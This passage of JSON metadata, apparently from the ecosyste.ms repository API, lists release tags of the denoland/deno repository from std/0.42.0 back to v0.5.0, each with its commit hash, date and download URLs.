gs/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@